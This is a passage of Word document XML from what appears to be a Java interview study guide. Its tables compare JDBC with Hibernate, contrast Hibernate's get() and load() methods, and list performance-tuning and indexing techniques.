      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="62A14EE2" w14:textId="77777777" w:rsidTr="0041674A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35EEAE2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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="209BAF8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uning required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FA907EA"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optimizations like lazy loading, caching</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="257A5BFB" w14:textId="77777777" w:rsidTr="0041674A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="615C1AC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atabase Independence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="257B321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ight coupling; DB-specific SQL required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="023E276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B-independent using dialects</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="32342F76" w14:textId="77777777" w:rsidTr="0041674A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6227838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earning Curve</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20EEA12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e and straightforward</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DA8077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eeper learning curve</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="05FFCB57" w14:textId="77777777" w:rsidTr="0041674A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="170D8ED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de Length</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E2CD6A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bose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="193449C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ess boilerplate code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="60B376D9" w14:textId="77777777" w:rsidTr="0041674A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41286CD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rror Handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46E57D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ry-catch, SQLException</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D0E8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exception hierarchy, cleaner handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="15EB06F2" w14:textId="77777777" w:rsidTr="0041674A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FE3470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s Support</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D28125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handled manually via joins</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="755340D4"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ally handles relationships via annotations/XML</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="365ED320" w14:textId="77777777" w:rsidTr="0041674A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7476243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Processing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7357411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75681E49"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ified via built-in methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6ED64F29" w14:textId="77777777" w:rsidR="0041674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4E6BF2">
          <v:rect id="_x0000_i2426" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA7BE3F"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43A5585"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DBC</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is suitable for small/simple applications where full control over SQL is needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEFB8F6"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ideal for complex, enterprise applications requiring object mapping, caching, and database independence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD498F6" w14:textId="1935008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427" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DB0CA4" w14:textId="5348B010" w:rsidR="0058719D" w:rsidRPr="00CE4B95" w:rsidRDefault="0058719D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="563" w:name="_Toc197867777"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What is the difference between get</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load</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 in hibernate?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="563"/>
    </w:p>
    <w:p w14:paraId="456E36E6" w14:textId="4F048A8F" w:rsidR="00F90DFB" w:rsidRPr="007F3379" w:rsidRDefault="00F90DFB"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65"/>
        <w:gridCol w:w="4248"/>
      </w:tblGrid>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="370446D9" w14:textId="77777777" w:rsidTr="00F90DFB">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="303CEEB9"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2C9EF62A"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get()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6956839E"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oad()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="5983837E" w14:textId="77777777" w:rsidTr="00F90DFB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A1ED5BD"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ing Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BFA848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ager</w:t>
            </w:r>
            <w:r w:rsidRPr="007F3379">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> – hits DB immediately</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64BA48B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w:t>
            </w:r>
            <w:r w:rsidRPr="007F3379">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> – returns proxy, DB hit on access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="7C08C735" w14:textId="77777777" w:rsidTr="00F90DFB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="255866C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turn Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B6B5FE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 if entity not found</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="714B97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ObjectNotFoundException if not found</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="703BB590" w14:textId="77777777" w:rsidTr="00F90DFB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77CF3A3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Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63F8EA2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unsure if the object exists</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F3ADCF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sure the object exists</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="7F036742" w14:textId="77777777" w:rsidTr="00F90DFB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DB13A3E"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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="531429C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lightly slower (immediate DB hit)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4793752F"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ore efficient when object might not be used</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="49AACD87" w14:textId="77777777" w:rsidTr="00F90DFB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="409D515A"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roxy Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E46C5A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proxy, real object returned</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C18ACD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a proxy unless accessed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="354F23B0" w14:textId="77777777" w:rsidTr="00F90DFB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="389B9AB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havior on Missing ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="448A72A9"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E5D88A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exception</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3818EE4E"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DB066">
          <v:rect id="_x0000_i2428" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7AF83C"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1B91DD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get()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F410CC"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01); // Hits DB immediately</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F352EFC" w14:textId="77777777" w:rsidR="00F90DFB" w:rsidRPr="007F3379" w:rsidRDefault="00F90DFB" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7658615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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379A769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load(Employee.class, 102); // Returns proxy; DB hit when accessed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC40C4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ystem.out.println(emp2.getName());               // DB hit happens here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B177A3F"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51FB6">
          <v:rect id="_x0000_i2429" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB9B227"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34F47855"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get() when you want to fetch the object immediately and safely handle missing records.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B91997"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load() when you're sure the object exists and want lazy loading with better performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268F561B" w14:textId="171B1E7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430" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9761A2" w14:textId="3DCB89AC" w:rsidR="00340E7E" w:rsidRPr="00CE4B95" w:rsidRDefault="00340E7E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="564" w:name="_Toc197867778"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Performance tuning and indexing in hibernate?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="564"/>
    </w:p>
    <w:p w14:paraId="6C6B25AE" w14:textId="64C55575" w:rsidR="00EA7E01" w:rsidRPr="007F3379" w:rsidRDefault="00EA7E01"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Performance Tuning and Indexing in Hibernate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65916996"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D5BF89">
          <v:rect id="_x0000_i2431" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="168C968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6767"/>
      </w:tblGrid>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="09073158" w14:textId="77777777" w:rsidTr="00EA7E01">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A78911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rea</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E63E2F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57281B8" w14:textId="77777777" w:rsidTr="00EA7E01">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73FCAA26"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3F1861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L1 (default)</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L2 cache</w:t>
            </w:r>
            <w:r w:rsidRPr="007F3379">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (EhCache, Infinispan) to avoid DB hits</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="7465B2CE" w14:textId="77777777" w:rsidTr="00EA7E01">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34E72C8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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23A4628E"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 only what’s needed using @OneToMany(fetch = FetchType.LAZY) etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="3228E55C" w14:textId="77777777" w:rsidTr="00EA7E01">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C89852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Fetching</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42C59D1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number of SQL queries with @BatchSize(size = N)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="2D46BBB3" w14:textId="77777777" w:rsidTr="00EA7E01">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65F3B80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agination</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51E730C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tFirstResult() and setMaxResults() for large datasets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="79EA234D" w14:textId="77777777" w:rsidTr="00EA7E01">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D9B9C78"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 Joins</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25CE644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optimized HQL joins to avoid N+1 query problem</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="4EF860C7" w14:textId="77777777" w:rsidTr="00EA7E01">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2659388F"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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47DB9BE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kariCP, C3P0 for efficient DB connection handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="1D80496D" w14:textId="77777777" w:rsidTr="00EA7E01">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29A5A22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TO Projections</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="524AE00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 only required columns instead of whole entities</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="05147EFB" w14:textId="77777777" w:rsidTr="00EA7E01">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D8DA3E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StatelessSession</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DD4BAF1"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no tracking of object changes is needed, for read-only scenarios</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="1DE67E85" w14:textId="77777777" w:rsidTr="00EA7E01">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E5804F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 SQL Logging Carefully</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11C3C19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void enabling in production due to performance impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E9084CA"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E116">
          <v:rect id="_x0000_i2432" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7943165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Indexing in Hibernate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBDFD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dexes improve query performance on large tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC4190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Database-Level Indexing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A014C3B"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 indexes in the database manually or via schema generation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED644BC"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lps speed up </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WHER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OIN</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ORDER BY</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
